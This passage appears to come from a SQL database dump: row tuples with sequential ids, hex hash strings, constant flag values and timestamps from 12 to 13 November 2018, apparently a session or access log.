(29802, '182486e17f4f46bb47ffbe869a7e175b', '381aa1d8da306be0', 0, 2, 1, '2018-11-12 03:32:34'),
(29803, '1d205f9ab70e06129fd860c6a273b187', 'a48d76ab21493439', 0, 2, 1, '2018-11-12 04:06:15'),
(29804, '70b6bdf1059e09e55634e65139ddc73d', '7333b44ce7080931', 0, 2, 1, '2018-11-12 04:18:01'),
(29805, 'b88fa2eb48e3e38d01f1a202bb4f2bb4', 'f5ea342846f5c547', 0, 2, 1, '2018-11-12 04:51:36'),
(29806, 'c597ee7f545fb016d50eeedc47b317ae', '965f6310925a7a7c', 0, 2, 1, '2018-11-12 05:09:45'),
(29807, '0186f6e2e52fdcf16aa2bdfe936691bd', '244dd7099c563ea3', 0, 2, 1, '2018-11-12 05:23:28'),
(29808, '0186f6e2e52fdcf16aa2bdfe936691bd', '244dd7099c563ea3', 0, 2, 1, '2018-11-12 05:24:12'),
(29809, 'eed85d8861ebdeaef0cca6041f4234fc', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-11-12 05:24:30'),
(29810, '29dabacafab0cf003980106e995ce669', '4574603cf07e6399', 0, 2, 1, '2018-11-12 06:01:11'),
(29811, '42a577f0688e3600a94da3d46141d044', '881af30552c05d1b', 0, 2, 1, '2018-11-12 06:12:55'),
(29812, '92137ccbcbb21006231c62907ce3f73d', 'b97a398a60943bf2', 0, 2, 1, '2018-11-12 06:15:21'),
(29813, '42a577f0688e3600a94da3d46141d044', '881af30552c05d1b', 0, 2, 1, '2018-11-12 06:18:18'),
(29814, '42a577f0688e3600a94da3d46141d044', '881af30552c05d1b', 0, 2, 1, '2018-11-12 06:22:03'),
(29815, '42a577f0688e3600a94da3d46141d044', '881af30552c05d1b', 0, 2, 1, '2018-11-12 06:38:43'),
(29816, '42a577f0688e3600a94da3d46141d044', '881af30552c05d1b', 0, 2, 1, '2018-11-12 06:39:47'),
(29817, '596928fb22e75f7c74dd1f28166be88e', 'e44663e992af0a44', 0, 2, 1, '2018-11-12 06:41:57'),
(29818, '50564aae9724f2b0faed9b3b3cc90571', 'd8923e60c6dca0dc', 0, 2, 1, '2018-11-12 06:42:09'),
(29819, '42a577f0688e3600a94da3d46141d044', '881af30552c05d1b', 0, 2, 1, '2018-11-12 06:44:50'),
(29820, '42a577f0688e3600a94da3d46141d044', '881af30552c05d1b', 0, 2, 1, '2018-11-12 06:45:24'),
(29821, '8e3e9043766c764f2b0b409ada7fbeb6', 'e2328e2af7d43e58', 0, 2, 1, '2018-11-12 07:00:22'),
(29822, '8e3e9043766c764f2b0b409ada7fbeb6', 'e2328e2af7d43e58', 0, 2, 1, '2018-11-12 07:05:52'),
(29823, '8e3e9043766c764f2b0b409ada7fbeb6', 'e2328e2af7d43e58', 0, 2, 1, '2018-11-12 07:06:21'),
(29824, '1af1b0e136c5c1fd17148fce712ffd7c', 'a4d9d8225838853d', 0, 2, 1, '2018-11-12 07:23:02'),
(29825, 'e78e9221656aafebec39aa63238aed36', '788bc96ed5d0e5f3', 0, 2, 1, '2018-11-12 08:11:00'),
(29826, 'e78e9221656aafebec39aa63238aed36', '788bc96ed5d0e5f3', 0, 2, 1, '2018-11-12 08:11:12'),
(29827, '9e0c782d086a9c07013a04e01d615b1a', '56706b521d1785eb', 0, 2, 1, '2018-11-12 08:48:08'),
(29828, 'ee51b532967b0b54f02088ac665997be', '1c0d50cfdaa18da5', 0, 2, 1, '2018-11-12 08:58:15'),
(29829, 'f87a4099253d6eff87c67a927d780561', '53f68319b17ad67b', 0, 2, 1, '2018-11-12 09:06:55'),
(29830, 'd505a91fed8d490839b50f5b0a2860e1', 'be53f2123a05014f', 0, 2, 1, '2018-11-12 09:19:38'),
(29831, '1af1b0e136c5c1fd17148fce712ffd7c', 'a4d9d8225838853d', 0, 2, 1, '2018-11-12 09:34:23'),
(29832, 'd93f10ae90b087bbe066707269cbeaa7', '922b06649ca1aef6', 0, 2, 1, '2018-11-12 10:18:29'),
(29833, '8e3e9043766c764f2b0b409ada7fbeb6', 'e2328e2af7d43e58', 0, 2, 1, '2018-11-12 10:49:38'),
(29834, 'de6470577d1deaac6a73cce45cb23a22', '53f68319b17ad67b', 0, 2, 1, '2018-11-12 10:50:04'),
(29835, '5e50d5c4c6afc807b8a4ca58cb6f8d41', '97638b20ddb580d8', 0, 2, 1, '2018-11-12 11:07:08'),
(29836, '7c6e620c294158c8265a6af92af3df3d', 'b42e7d1f87a5da92', 0, 2, 1, '2018-11-12 11:17:37'),
(29837, '6b0ffafdd9e6e7ba51ee489fd540de27', 'ebbd87f2564b6638', 0, 2, 1, '2018-11-12 11:44:57'),
(29838, '349a1b4edfb99ddb94cdb651f37b39ba', '75d53a22be3cf02b', 0, 2, 1, '2018-11-12 11:54:48'),
(29839, '4e8af19d4c226275f0b29246ee10ad46', '93942cdd1d012ea7', 0, 2, 1, '2018-11-12 11:57:27'),
(29840, 'b84e2ea22d79d3dd4421cc040e207170', '12dc84f886d22c14', 0, 2, 1, '2018-11-12 12:06:24'),
(29841, 'c5d3b58781308a9c01961788a067a632', '61d3b1b105794108', 0, 2, 1, '2018-11-12 12:40:08'),
(29842, '88ce49431da1c1e9e39ffa9f7db16150', 'ff96d50e70de0a31', 0, 2, 1, '2018-11-12 12:42:31'),
(29843, '3eafe632b20132a6f1bb38623e72c33c', '583a750504215fad', 0, 2, 1, '2018-11-12 13:23:35'),
(29844, '3eafe632b20132a6f1bb38623e72c33c', '583a750504215fad', 0, 2, 1, '2018-11-12 13:23:38'),
(29845, '0d3d3a2059b274ce988a2f96051d3f37', 'bcbbaaeab29766cd', 0, 2, 1, '2018-11-12 13:25:37'),
(29846, '0d3d3a2059b274ce988a2f96051d3f37', 'bcbbaaeab29766cd', 0, 2, 1, '2018-11-12 13:26:36'),
(29847, '0d3d3a2059b274ce988a2f96051d3f37', 'bcbbaaeab29766cd', 0, 2, 1, '2018-11-12 13:27:55'),
(29848, '0d3d3a2059b274ce988a2f96051d3f37', 'bcbbaaeab29766cd', 0, 2, 1, '2018-11-12 13:29:44'),
(29849, '0d3d3a2059b274ce988a2f96051d3f37', 'bcbbaaeab29766cd', 0, 2, 1, '2018-11-12 13:36:04'),
(29850, '0d3d3a2059b274ce988a2f96051d3f37', 'bcbbaaeab29766cd', 0, 2, 1, '2018-11-12 13:36:44'),
(29851, '0d3d3a2059b274ce988a2f96051d3f37', 'bcbbaaeab29766cd', 0, 2, 1, '2018-11-12 13:37:40'),
(29852, 'ef70b8d24b4ffdf98d565af7353b2e79', '7b376d0cd1f5db40', 0, 2, 1, '2018-11-12 13:50:04'),
(29853, '57b54e84f112a934f1cd8b0589079406', '9fb43b300e11d3a2', 0, 2, 1, '2018-11-12 13:54:09'),
(29854, '32b61a798eaad9b7834508010a8c2d2d', '632e659a65f2a167', 0, 2, 1, '2018-11-12 13:58:51'),
(29855, 'b34a5a099d0abd31f44bf8c125b6328d', '50376992838b1bea', 0, 2, 1, '2018-11-12 14:07:10'),
(29856, '1d6f671a40358d9c3486b4a47ab71c48', 'dd80a9271d88f606', 0, 2, 1, '2018-11-12 14:18:35'),
(29857, '6b0ffafdd9e6e7ba51ee489fd540de27', 'ebbd87f2564b6638', 0, 2, 1, '2018-11-12 14:19:49'),
(29858, '1d6f671a40358d9c3486b4a47ab71c48', 'dd80a9271d88f606', 0, 2, 1, '2018-11-12 14:22:14'),
(29859, '1d6f671a40358d9c3486b4a47ab71c48', 'dd80a9271d88f606', 0, 2, 1, '2018-11-12 14:23:52'),
(29860, '1d6f671a40358d9c3486b4a47ab71c48', 'dd80a9271d88f606', 0, 2, 1, '2018-11-12 14:27:36'),
(29861, '1d6f671a40358d9c3486b4a47ab71c48', 'dd80a9271d88f606', 0, 2, 1, '2018-11-12 14:27:55'),
(29862, '1d6f671a40358d9c3486b4a47ab71c48', 'dd80a9271d88f606', 0, 2, 1, '2018-11-12 14:28:34'),
(29863, '1d6f671a40358d9c3486b4a47ab71c48', 'dd80a9271d88f606', 0, 2, 1, '2018-11-12 14:30:27'),
(29864, 'b6f631226c6719d98c3c4118b9884e65', '6e7a8f90c8e27a1c', 0, 2, 1, '2018-11-12 14:52:05'),
(29865, 'e676ac11918feb1dd403f5dba9a5b901', 'cd809b8cde078906', 0, 2, 1, '2018-11-12 14:56:52'),
(29866, '8e3e9043766c764f2b0b409ada7fbeb6', 'e2328e2af7d43e58', 0, 2, 1, '2018-11-12 15:01:19'),
(29867, '18d2c6e63ad58f7673bf62088556d30b', '34ec142c805c34fe', 0, 2, 1, '2018-11-12 15:10:36'),
(29868, '31652dc93dc71399abe71f07ccca326d', '06e614bc9fc70519', 0, 2, 1, '2018-11-12 15:29:11'),
(29869, 'd41c83f39a9d8ccdb057783e6ee89f1e', 'dfe3572a2cf5b666', 0, 2, 1, '2018-11-12 15:29:11'),
(29870, '8e3e9043766c764f2b0b409ada7fbeb6', 'e2328e2af7d43e58', 0, 2, 1, '2018-11-12 15:36:01'),
(29871, 'f7e57a7374b202b773174ab580d72d94', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-11-12 16:02:47'),
(29872, 'f7e57a7374b202b773174ab580d72d94', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-11-12 16:08:07'),
(29873, 'f7e57a7374b202b773174ab580d72d94', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-11-12 16:08:19'),
(29874, 'd2dc071fd357e2a755330c6f1dd527ad', '1c696f8a41d77070', 0, 2, 1, '2018-11-12 16:15:00'),
(29875, '02ea26ea0e91432e813dba18c8148832', '3d39da1245c0108b', 0, 2, 1, '2018-11-12 16:43:53'),
(29876, 'f48d3b08a3882f8ec73d55594799d813', '1bc71c467b227ed1', 0, 2, 1, '2018-11-12 17:08:43'),
(29877, 'a36437cee7634ed26c181ea0c7980448', 'f6ffc947bf3305fe', 0, 2, 1, '2018-11-12 17:48:33'),
(29878, '6c58ede8884859b28db48da0ded9cdb4', 'd809246448516900', 0, 2, 1, '2018-11-12 18:20:51'),
(29879, '19fdd2ce5eea14b7d448eddc05420b0d', 'abe6c8ead564b456', 0, 2, 1, '2018-11-12 18:24:12'),
(29880, '8ba3e087b4c29e2d8cb07da97c61819e', 'cb46b9eb48ef9993', 0, 2, 1, '2018-11-12 18:24:31'),
(29881, '12cb791d6cf52c4d21406b30a6f7a109', 'f3f3de8bf97f7b07', 0, 2, 1, '2018-11-12 19:15:04'),
(29882, '11f386c7034a1e200747d5218377cf1e', '2c9bed5f85366b84', 0, 2, 1, '2018-11-12 19:18:33'),
(29883, '0312ae17480e1172849b8f71d32b43d3', '9d483bf8513b7000', 0, 2, 1, '2018-11-12 19:22:56'),
(29884, '8e3e9043766c764f2b0b409ada7fbeb6', 'e2328e2af7d43e58', 0, 2, 1, '2018-11-12 21:08:20'),
(29885, 'aed2c93338d90706cb0edaab02cc2c7b', '33d2246811dc93d4', 0, 2, 1, '2018-11-12 22:23:12'),
(29886, '2d1cc77ffc9323dc4c2c90912c3916d7', 'd1243b4b918c3429', 0, 2, 1, '2018-11-12 22:43:18'),
(29887, '4a85df7cbc976bf172305b2451b8af68', '6138f9891c9d0b71', 0, 2, 1, '2018-11-12 23:04:35'),
(29888, 'a0898a5a568f2618bbd5e9e99af1e9e7', '9f3df58af0dda4c4', 0, 2, 1, '2018-11-13 00:06:15'),
(29889, 'afb19eda915a189be1e6997de50148b4', 'dd0eb6912d1f356b', 0, 2, 1, '2018-11-13 00:41:44'),
(29890, '889ef16dbc9d84b8f11f57ece5981ee8', '61d8cfea4abb7eef', 0, 2, 1, '2018-11-13 01:14:52'),
(29891, '889ef16dbc9d84b8f11f57ece5981ee8', '61d8cfea4abb7eef', 0, 2, 1, '2018-11-13 01:15:53'),
(29892, '889ef16dbc9d84b8f11f57ece5981ee8', '61d8cfea4abb7eef', 0, 2, 1, '2018-11-13 01:17:37'),
(29893, '5445b898d6a03d6d6bad269bb7e6dbec', '0db2b79a176a7725', 0, 2, 1, '2018-11-13 01:46:33'),
(29894, '110a5ee05828fcb861445058ceaddc92', '3bae96fa66cc230d', 0, 2, 1, '2018-11-13 02:04:44'),
(29895, '91eba7a7e8360241c989b1bd579979da', '149327c6ced5894c', 0, 2, 1, '2018-11-13 02:51:36'),
(29896, '778666d1b6a6a65c7aed957b39cf7c87', '381aa1d8da306be0', 0, 2, 1, '2018-11-13 03:25:29'),
(29897, 'a1767d5add0b81b10320e4b617e541f9', '512257c1bceb5bd1', 0, 2, 1, '2018-11-13 03:31:10'),
(29898, '8c0eac19c5bdd8001ed5e6da856eec34', 'f19010d8a5f137d0', 0, 2, 1, '2018-11-13 04:44:22'),
(29899, '37908a36e79a68c58899ed9a00202004', '788bc96ed5d0e5f3', 0, 2, 1, '2018-11-13 05:17:44'),
(29900, '37908a36e79a68c58899ed9a00202004', '788bc96ed5d0e5f3', 0, 2, 1, '2018-11-13 05:17:58'),
(29901, '37908a36e79a68c58899ed9a00202004', '788bc96ed5d0e5f3', 0, 2, 1, '2018-11-13 05:18:13'),
(29902, '2e05aab36124e5717311ddc266e11e2a', '8d96482d446e2629', 0, 2, 1, '2018-11-13 05:18:54'),
(29903, '64aa412b3465e4ebae634284ed1814b8', '574f64490fa2f7bf', 0, 2, 1, '2018-11-13 05:24:32'),
(29904, '64aa412b3465e4ebae634284ed1814b8', '574f64490fa2f7bf', 0, 2, 1, '2018-11-13 05:24:42'),
(29905, '57dff1e194086d92a9618d1e27e46022', 'ee048a80ed202af2', 0, 2, 1, '2018-11-13 05:24:51'),
(29906, 'e265f2c2dc6189d8c1c4e8c679fbc1fb', '46713cac27a94b83', 0, 2, 1, '2018-11-13 05:25:17'),
(29907, '57dff1e194086d92a9618d1e27e46022', 'ee048a80ed202af2', 0, 2, 1, '2018-11-13 05:25:25'),
(29908, '57dff1e194086d92a9618d1e27e46022', 'ee048a80ed202af2', 0, 2, 1, '2018-11-13 05:25:59'),
(29909, 'ea0ce3368595ac1ed566ee2cad6a019c', '32cd5ee0592c3279', 0, 2, 1, '2018-11-13 05:26:14'),
(29910, 'e265f2c2dc6189d8c1c4e8c679fbc1fb', '46713cac27a94b83', 0, 2, 1, '2018-11-13 05:26:28'),
(29911, 'b02e3562b95e2eaf863ad51bc7f78318', '525f91bc831ffaf5', 0, 2, 1, '2018-11-13 05:26:45'),
(29912, '37908a36e79a68c58899ed9a00202004', '788bc96ed5d0e5f3', 0, 2, 1, '2018-11-13 05:27:53'),
(29913, '28f187c98d5248307f8debaecca144d9', '32b169e936bbe5df', 0, 2, 1, '2018-11-13 05:28:05'),
(29914, '894bebfd4563f789ec9ddb1f3bc9fcf9', '687058b58830fd3e', 0, 2, 1, '2018-11-13 05:28:11'),
(29915, '37908a36e79a68c58899ed9a00202004', '788bc96ed5d0e5f3', 0, 2, 1, '2018-11-13 05:28:17'),
(29916, 'a66bc910820887fc06e28aa291fc5f43', '0ca668ef936b8885', 0, 2, 1, '2018-11-13 05:28:38'),
(29917, '894bebfd4563f789ec9ddb1f3bc9fcf9', '687058b58830fd3e', 0, 2, 1, '2018-11-13 05:28:52'),
(29918, 'e265f2c2dc6189d8c1c4e8c679fbc1fb', '46713cac27a94b83', 0, 2, 1, '2018-11-13 05:29:28'),
(29919, 'aa6a76c65555c3992c6c84fd95b8dadf', 'f10990f26adcd1c5', 0, 2, 1, '2018-11-13 05:29:34'),
(29920, '0d8964de39ce34f03fedbeb4eabf67d1', '6e74dad06c6f753b', 0, 2, 1, '2018-11-13 05:29:51'),
(29921, 'aa6a76c65555c3992c6c84fd95b8dadf', 'f10990f26adcd1c5', 0, 2, 1, '2018-11-13 05:30:02'),
(29922, 'e265f2c2dc6189d8c1c4e8c679fbc1fb', '46713cac27a94b83', 0, 2, 1, '2018-11-13 05:30:20'),
(29923, '6d97d274c45b0e7962b327a1eb9405e3', '6c285da1ec25f52f', 0, 2, 1, '2018-11-13 05:30:55'),
(29924, 'a3b93e1822f1c4e769448fec3bfda766', '72b93381959cb5c8', 0, 2, 1, '2018-11-13 05:33:55'),
(29925, 'a66bc910820887fc06e28aa291fc5f43', '0ca668ef936b8885', 0, 2, 1, '2018-11-13 05:34:05'),
(29926, '6b0bf16e006ff6d09c36225c4e63d1e6', '553b9f0a18b97af8', 0, 2, 1, '2018-11-13 05:34:11'),
(29927, 'a66bc910820887fc06e28aa291fc5f43', '0ca668ef936b8885', 0, 2, 1, '2018-11-13 05:34:33'),
(29928, '894bebfd4563f789ec9ddb1f3bc9fcf9', '687058b58830fd3e', 0, 2, 1, '2018-11-13 05:35:03'),
(29929, '28f187c98d5248307f8debaecca144d9', '32b169e936bbe5df', 0, 2, 1, '2018-11-13 05:35:10'),
(29930, '37908a36e79a68c58899ed9a00202004', '788bc96ed5d0e5f3', 0, 2, 1, '2018-11-13 05:35:33'),
(29931, '652fb015ef9df75939b1a97889475201', 'aebe4806f0311e79', 0, 2, 1, '2018-11-13 05:35:37'),
(29932, '37908a36e79a68c58899ed9a00202004', '788bc96ed5d0e5f3', 0, 2, 1, '2018-11-13 05:35:41'),
(29933, '894bebfd4563f789ec9ddb1f3bc9fcf9', '687058b58830fd3e', 0, 2, 1, '2018-11-13 05:36:15'),
(29934, '28f187c98d5248307f8debaecca144d9', '32b169e936bbe5df', 0, 2, 1, '2018-11-13 05:36:53'),
(29935, '57dff1e194086d92a9618d1e27e46022', 'ee048a80ed202af2', 0, 2, 1, '2018-11-13 05:36:57'),
(29936, '57dff1e194086d92a9618d1e27e46022', 'ee048a80ed202af2', 0, 2, 1, '2018-11-13 05:37:12'),
(29937, 'b02e3562b95e2eaf863ad51bc7f78318', '525f91bc831ffaf5', 0, 2, 1, '2018-11-13 05:37:19'),
(29938, '28f187c98d5248307f8debaecca144d9', '32b169e936bbe5df', 0, 2, 1, '2018-11-13 05:38:01'),
(29939, '28f187c98d5248307f8debaecca144d9', '32b169e936bbe5df', 0, 2, 1, '2018-11-13 05:38:16'),
(29940, '28f187c98d5248307f8debaecca144d9', '32b169e936bbe5df', 0, 2, 1, '2018-11-13 05:38:39'),
(29941, '894bebfd4563f789ec9ddb1f3bc9fcf9', '687058b58830fd3e', 0, 2, 1, '2018-11-13 05:38:54'),
(29942, '652fb015ef9df75939b1a97889475201', 'aebe4806f0311e79', 0, 2, 1, '2018-11-13 05:39:09'),
(29943, '6b0bf16e006ff6d09c36225c4e63d1e6', '553b9f0a18b97af8', 0, 2, 1, '2018-11-13 05:39:16'),
(29944, '150da03b454dfce6e5a6f40abdf72e35', 'df27b9a2919a8206', 0, 2, 1, '2018-11-13 05:39:42'),
(29945, '150da03b454dfce6e5a6f40abdf72e35', 'df27b9a2919a8206', 0, 2, 1, '2018-11-13 05:40:11'),
(29946, '64aa412b3465e4ebae634284ed1814b8', '574f64490fa2f7bf', 0, 2, 1, '2018-11-13 05:40:20'),
(29947, '28f187c98d5248307f8debaecca144d9', '32b169e936bbe5df', 0, 2, 1, '2018-11-13 05:41:39'),
(29948, '150da03b454dfce6e5a6f40abdf72e35', 'df27b9a2919a8206', 0, 2, 1, '2018-11-13 05:41:45'),
(29949, '28f187c98d5248307f8debaecca144d9', '32b169e936bbe5df', 0, 2, 1, '2018-11-13 05:41:54'),
(29950, '5d11f75f786a1804fc23cc8260968e05', 'aebe4806f0311e79', 0, 2, 1, '2018-11-13 05:42:19'),
(29951, '150da03b454dfce6e5a6f40abdf72e35', 'df27b9a2919a8206', 0, 2, 1, '2018-11-13 05:42:25'),
(29952, 'a66bc910820887fc06e28aa291fc5f43', '0ca668ef936b8885', 0, 2, 1, '2018-11-13 05:43:05'),
(29953, 'b02e3562b95e2eaf863ad51bc7f78318', '525f91bc831ffaf5', 0, 2, 1, '2018-11-13 05:43:28'),
(29954, '37908a36e79a68c58899ed9a00202004', '788bc96ed5d0e5f3', 0, 2, 1, '2018-11-13 05:43:41'),
(29955, '37908a36e79a68c58899ed9a00202004', '788bc96ed5d0e5f3', 0, 2, 1, '2018-11-13 05:43:49'),
(29956, '150da03b454dfce6e5a6f40abdf72e35', 'df27b9a2919a8206', 0, 2, 1, '2018-11-13 05:44:24'),
(29957, '2e69fac554b72271570da718f5badf4f', 'e8bc38c8a279acfe', 0, 2, 1, '2018-11-13 05:45:05'),
(29958, '2e69fac554b72271570da718f5badf4f', 'e8bc38c8a279acfe', 0, 2, 1, '2018-11-13 05:45:30'),
(29959, '894bebfd4563f789ec9ddb1f3bc9fcf9', '687058b58830fd3e', 0, 2, 1, '2018-11-13 05:46:11'),
(29960, 'b02e3562b95e2eaf863ad51bc7f78318', '525f91bc831ffaf5', 0, 2, 1, '2018-11-13 05:46:17'),
(29961, '894bebfd4563f789ec9ddb1f3bc9fcf9', '687058b58830fd3e', 0, 2, 1, '2018-11-13 05:46:26'),
(29962, '894bebfd4563f789ec9ddb1f3bc9fcf9', '687058b58830fd3e', 0, 2, 1, '2018-11-13 05:46:39'),
(29963, '9e788a04d0bd89259b9aee1074571628', 'c0d620ee8725a926', 0, 2, 1, '2018-11-13 05:47:46'),
(29964, '894bebfd4563f789ec9ddb1f3bc9fcf9', '687058b58830fd3e', 0, 2, 1, '2018-11-13 05:48:09'),
(29965, '0f5cafae32fcc920c46037a318cae80d', '6720ee6eea3e5a48', 0, 2, 1, '2018-11-13 05:49:27'),
(29966, 'a3b93e1822f1c4e769448fec3bfda766', '72b93381959cb5c8', 0, 2, 1, '2018-11-13 05:49:29'),
(29967, 'f98ace54e8306231c2a1df931e0ff39d', '74aba437eea39f30', 0, 2, 1, '2018-11-13 05:49:46'),
(29968, '28f187c98d5248307f8debaecca144d9', '32b169e936bbe5df', 0, 2, 1, '2018-11-13 05:50:23'),
(29969, '7f227302325d94dd893f2aed2309f851', '1de090ec808c88cc', 0, 2, 1, '2018-11-13 05:50:27'),
(29970, '7273f39e436ecca65f51393f7c8bfdb8', '819477a20772ca36', 0, 2, 1, '2018-11-13 05:50:43'),
(29971, '6d97d274c45b0e7962b327a1eb9405e3', '6c285da1ec25f52f', 0, 2, 1, '2018-11-13 05:50:48'),
(29972, '493ab8b126231fc2d88bfb124b1fb476', '87c031d705607902', 0, 2, 1, '2018-11-13 05:51:14'),
(29973, '6d97d274c45b0e7962b327a1eb9405e3', '6c285da1ec25f52f', 0, 2, 1, '2018-11-13 05:51:17'),
(29974, '0cccfd30d659cfb9ae14e4850052fd24', 'cffbf4f63295894a', 0, 2, 1, '2018-11-13 05:51:27'),
(29975, '7273f39e436ecca65f51393f7c8bfdb8', '819477a20772ca36', 0, 2, 1, '2018-11-13 05:51:38'),
(29976, '7f227302325d94dd893f2aed2309f851', '1de090ec808c88cc', 0, 2, 1, '2018-11-13 05:51:50'),
(29977, '6d97d274c45b0e7962b327a1eb9405e3', '6c285da1ec25f52f', 0, 2, 1, '2018-11-13 05:52:00'),
(29978, '7273f39e436ecca65f51393f7c8bfdb8', '819477a20772ca36', 0, 2, 1, '2018-11-13 05:52:01'),
(29979, '7273f39e436ecca65f51393f7c8bfdb8', '819477a20772ca36', 0, 2, 1, '2018-11-13 05:52:17'),
(29980, 'a8dc02bb16d1abdad55865075a82b29b', 'e216e7808556cb4e', 0, 2, 1, '2018-11-13 05:52:21'),
(29981, '150da03b454dfce6e5a6f40abdf72e35', 'df27b9a2919a8206', 0, 2, 1, '2018-11-13 05:52:31'),
(29982, '317e3fa0915a6bfccd6c693a2f5f608d', '7501b42c35accff7', 0, 2, 1, '2018-11-13 05:52:52'),
(29983, '317e3fa0915a6bfccd6c693a2f5f608d', '7501b42c35accff7', 0, 2, 1, '2018-11-13 05:53:09'),
(29984, 'bd6768f626301f5ba2183b6a29c89917', '6092d6c1cb041b23', 0, 2, 1, '2018-11-13 05:53:36'),
(29985, '4faec16889fa63ed8f6e96d4aea93108', '32cd5ee0592c3279', 0, 2, 1, '2018-11-13 05:54:05'),
(29986, '4faec16889fa63ed8f6e96d4aea93108', '32cd5ee0592c3279', 0, 2, 1, '2018-11-13 05:54:09'),
(29987, 'f98ace54e8306231c2a1df931e0ff39d', '74aba437eea39f30', 0, 2, 1, '2018-11-13 05:54:31'),
(29988, '6b0bf16e006ff6d09c36225c4e63d1e6', '553b9f0a18b97af8', 0, 2, 1, '2018-11-13 05:54:40'),
(29989, 'a8dc02bb16d1abdad55865075a82b29b', 'e216e7808556cb4e', 0, 2, 1, '2018-11-13 05:54:52'),
(29990, '4dfa6800e42046a8ee487f6c0a14674e', '1cc364e07c1e7fcd', 0, 2, 1, '2018-11-13 05:55:50'),
(29991, '317e3fa0915a6bfccd6c693a2f5f608d', '7501b42c35accff7', 0, 2, 1, '2018-11-13 05:55:58'),
(29992, '4faec16889fa63ed8f6e96d4aea93108', '32cd5ee0592c3279', 0, 2, 1, '2018-11-13 05:56:09'),
(29993, '4faec16889fa63ed8f6e96d4aea93108', '32cd5ee0592c3279', 0, 2, 1, '2018-11-13 05:56:14'),
(29994, '2e1eb638889e8cefac18514cf3484148', 'ebe5e57f7bcb9be7', 0, 2, 1, '2018-11-13 05:56:22'),
(29995, '2e1eb638889e8cefac18514cf3484148', 'ebe5e57f7bcb9be7', 0, 2, 1, '2018-11-13 05:56:55'),
(29996, '4dfa6800e42046a8ee487f6c0a14674e', '1cc364e07c1e7fcd', 0, 2, 1, '2018-11-13 05:56:56'),
(29997, '9e788a04d0bd89259b9aee1074571628', 'c0d620ee8725a926', 0, 2, 1, '2018-11-13 05:57:41'),
(29998, 'aa6a76c65555c3992c6c84fd95b8dadf', 'f10990f26adcd1c5', 0, 2, 1, '2018-11-13 05:57:52'),
(29999, 'efe08752aa6983d6e0587764697cefe3', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2018-11-13 05:58:31'),
(30000, 'ceee4d39b60bf6dae41076c57a99b391', '12fc4b801e5257e8', 0, 2, 1, '2018-11-13 05:58:44'),
(30001, 'efe08752aa6983d6e0587764697cefe3', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2018-11-13 05:58:46'),
(30002, '3f4a48758eb63bfb1366e90cdd12588c', 'aebe4806f0311e79', 0, 2, 1, '2018-11-13 05:58:49'),
(30003, 'ceee4d39b60bf6dae41076c57a99b391', '12fc4b801e5257e8', 0, 2, 1, '2018-11-13 05:59:00'),
(30004, '778666d1b6a6a65c7aed957b39cf7c87', '381aa1d8da306be0', 0, 2, 1, '2018-11-13 05:59:03'),
(30005, '4faec16889fa63ed8f6e96d4aea93108', '32cd5ee0592c3279', 0, 2, 1, '2018-11-13 05:59:15'),
(30006, 'ceee4d39b60bf6dae41076c57a99b391', '12fc4b801e5257e8', 0, 2, 1, '2018-11-13 05:59:16'),
(30007, 'ceee4d39b60bf6dae41076c57a99b391', '12fc4b801e5257e8', 0, 2, 1, '2018-11-13 05:59:58'),
(30008, 'f12bf6d6b7efcbb598eac71bd97a1d44', '5a883dd79dd2a20d', 0, 2, 1, '2018-11-13 06:00:04'),
(30009, '2e1eb638889e8cefac18514cf3484148', 'ebe5e57f7bcb9be7', 0, 2, 1, '2018-11-13 06:00:08'),
(30010, '2e1eb638889e8cefac18514cf3484148', 'ebe5e57f7bcb9be7', 0, 2, 1, '2018-11-13 06:00:29'),
(30011, '096534b4553fbe69a4c08f252c98bcd2', 'b75cfccf9a02ba5d', 0, 2, 1, '2018-11-13 06:00:40'),
(30012, '9a9e5efc2f3286cc64e6d494b80b6f89', 'e216e7808556cb4e', 0, 2, 1, '2018-11-13 06:00:51'),
(30013, '9e788a04d0bd89259b9aee1074571628', 'c0d620ee8725a926', 0, 2, 1, '2018-11-13 06:01:04'),
(30014, '058da6412721de80113c23588479543e', '5d5c6e272bdea80c', 0, 2, 1, '2018-11-13 06:01:21'),
(30015, '38c4c9745b78e98a13f5d43d0212eb2f', '12ed21842ec29d17', 0, 2, 1, '2018-11-13 06:01:47'),
(30016, '058da6412721de80113c23588479543e', '5d5c6e272bdea80c', 0, 2, 1, '2018-11-13 06:01:47'),
(30017, 'e6733c6806ea8de3f2cce92c483260f8', '0ca668ef936b8885', 0, 2, 1, '2018-11-13 06:01:50'),
(30018, '38c4c9745b78e98a13f5d43d0212eb2f', '12ed21842ec29d17', 0, 2, 1, '2018-11-13 06:01:54'),
(30019, '38c4c9745b78e98a13f5d43d0212eb2f', '12ed21842ec29d17', 0, 2, 1, '2018-11-13 06:02:48'),
(30020, '38c4c9745b78e98a13f5d43d0212eb2f', '12ed21842ec29d17', 0, 2, 1, '2018-11-13 06:03:38'),
(30021, '38c4c9745b78e98a13f5d43d0212eb2f', '12ed21842ec29d17', 0, 2, 1, '2018-11-13 06:04:07'),
(30022, '38c4c9745b78e98a13f5d43d0212eb2f', '12ed21842ec29d17', 0, 2, 1, '2018-11-13 06:04:16'),
(30023, '38c4c9745b78e98a13f5d43d0212eb2f', '12ed21842ec29d17', 0, 2, 1, '2018-11-13 06:04:39'),
(30024, '8862e36a61dfcfb094f1f1626ab78080', '236890fa7b191f32', 0, 2, 1, '2018-11-13 06:04:48'),
(30025, '38c4c9745b78e98a13f5d43d0212eb2f', '12ed21842ec29d17', 0, 2, 1, '2018-11-13 06:05:49'),
(30026, '6d82532406b5c287e3f874e8dcd8df9d', 'fd6a5f5164ebb0bd', 0, 2, 1, '2018-11-13 06:06:23'),
(30027, '9e788a04d0bd89259b9aee1074571628', 'c0d620ee8725a926', 0, 2, 1, '2018-11-13 06:06:58'),
(30028, 'fa3316877b0118d9219b5f41b68a8f11', '1e8a7fa023e231db', 0, 2, 1, '2018-11-13 06:07:35'),
(30029, 'e42dc33cd7122049411dabe9f019420a', 'bc5a9dc728ad22f7', 0, 2, 1, '2018-11-13 06:07:47'),
(30030, 'e42dc33cd7122049411dabe9f019420a', 'bc5a9dc728ad22f7', 0, 2, 1, '2018-11-13 06:08:01'),
